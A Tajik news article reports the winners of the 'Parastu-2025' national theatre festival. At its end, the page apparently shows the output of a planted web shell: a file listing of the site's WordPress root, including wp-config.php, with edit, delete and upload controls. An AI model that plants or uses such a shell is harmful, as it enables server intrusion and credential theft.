36.2 C
Душанбе

Натиҷагирӣ аз “Парасту–2025” ва эълони барандагони он

Рӯзи 21-уми апрел дар Намоишсарои опера ва балети Садриддин Айнӣ маросими натиҷагирӣ аз Ҷашнвораи саросарии намоишсарҳои ҳирфаӣ “Парасту – 2025” баргузор гардид, ки шоҳҷоизаи ин ҷашнвора сазовори Намоишсарои академӣ-драмаи Абулқосим Лоҳутӣ барои намоиши “Достони Сиёвуш” дониста шуд.

Дар оғози ин маросим, ки бо ҳузур ва ширкати ҳунарпешагону намоишноманависҳо, коргардонҳо ва ҳаводорони ҳунар сурат гирифт, порчаҳо аз 17 намоиши озмунӣ намоиш дода шуд.

Бинобар натиҷагирии доварон аз Тоҷикистону Ӯзбекистон, Қазоқистон ва Русия мақоми нахуст ба Намоишсарои Меҳрубон Назарови шаҳри Хоруғ барои намоиши “Ял”; мақоми дувум ба Намоишсарои Данғара барои намоиши “Ривояти суғдӣ” ва ҳамин тавр мақоми сеюм ба Намоишсарои Туҳфа Фозиловаи шаҳри Конибодон барои намоиши “Бозгашт” тақдим шуд.

Дар идома чунин ҷоизаҳо ба намоишсароҳо ва ҳунарпешаҳо эъто гардид:

— ҷоизаи “Фарҳанги волои саҳна” – ба Низомиддин Раҳмонов барои нақши Мир Сайид Алии Ҳамадонӣ дар намоиши «Ахтаре аз Хатлонзамин» аз Намоишсарои мусиқӣ-мазҳакавии Сайдалӣ Вализодаи шаҳри Кӯлоб;

— ҷоизаи “Беҳтарин ороиши саҳна” – ба Хайрулло Давлатов барои намоиши «Зангирӣ ё дамгирӣ» аз Намоишсарои мусиқӣ-драмаи Ато Муҳаммадҷонови шаҳри Бохтар;

— ҷоизаи “Беҳтарин намоиши лӯхтак” – Намоишсарои лӯхтаки лӯхтаки шаҳри Бӯстон;

— ҷоизаи “Беҳтарин нақши эпизодӣ” – ба Тоҳир Меликов аз Намоишсарои ӯзбекии драма ва мусиқии ба номи Бурҳонови ноҳияи Спитамен;

— ҷоизаи “Беҳтарин ансамбли ҳунарӣ” – ба Намоишсарои мусиқӣ-мазҳакавии Бохтар барои намоиши «Зангирӣ ё дамгирӣ»;

— ҷоизаи “Беҳтарин нақши балет” – ба Фарангис Саидзода барои нақши Томирис дар намоиши «Куруши Кабир»-и Намоишсарои опера ва балет;

— ҷоизаи “Беҳтарин нақши занона” – ба Рухшона Улфатова барои нақши Татяна дар намоиши «Евгений Онегин»-и Намоишсарои озмоишии тамошобини ҷавон ба номи М. Қосимов;

— ҷоизаи “Беҳтарин нақши мардона” – ба Дмитрий Мурзинов аз Намоишсарои драмаи русии ба номи В. Маяковский;

— ҷоизаи “Беҳтарин коргардон” – ба Хуршед Мустафоев барои намоиши “Базм дар айёми вабо” аз Намоишсарои драмаи русии ба номи В. Маяковский.

Гуфтанист, Ҷашнвораи саросарии театрҳои касбӣ “Парасту-2025” тайи рӯзҳои 14–21-уми  апрел идома кард, ки дар чаҳорчӯби он 17 намоишсарои дохилӣ намоиш рӯйи саҳна гузоштанд.

Ёдоварӣ мекунем, ки ҷашнвораи “Парасту” дар ду сол як бо ҳузури намоишсароҳои Тоҷикистон барпо мегардад.

- Таблиғ -spot_img

Быть в курсе

Подпишитесь на обновления материалов сайта adab.tj на ваш электронный ящик.

- Таблиғ -spot_img

Хабарҳои охир

Акси гӯё

Бахшҳо

Current Dir: /var/www/adab.tj/html/

[FILE] .htaccess [ edit | delete | rename ]
[FILE] index.php [ edit | delete | rename ]
[FILE] license.txt [ edit | delete | rename ]
[FILE] readme.html [ edit | delete | rename ]
[FILE] wordpress-6.7.1-ru_RU.zip [ edit | delete | rename ]
[FILE] wp-activate.php [ edit | delete | rename ]
[DIR]  wp-admin [ delete | rename ]
[FILE] wp-blog-header.php [ edit | delete | rename ]
[FILE] wp-comments-post.php [ edit | delete | rename ]
[FILE] wp-config-sample.php [ edit | delete | rename ]
[FILE] wp-config.php [ edit | delete | rename ]
[DIR]  wp-content [ delete | rename ]
[FILE] wp-cron.php [ edit | delete | rename ]
[DIR]  wp-includes [ delete | rename ]
[FILE] wp-links-opml.php [ edit | delete | rename ]
[FILE] wp-load.php [ edit | delete | rename ]
[FILE] wp-login.php [ edit | delete | rename ]
[FILE] wp-mail.php [ edit | delete | rename ]
[FILE] wp-settings.php [ edit | delete | rename ]
[FILE] wp-signup.php [ edit | delete | rename ]
[FILE] wp-trackback.php [ edit | delete | rename ]
[DIR]  www [ delete | rename ]
[FILE] xmlrpc.php [ edit | delete | rename ]

Upload File: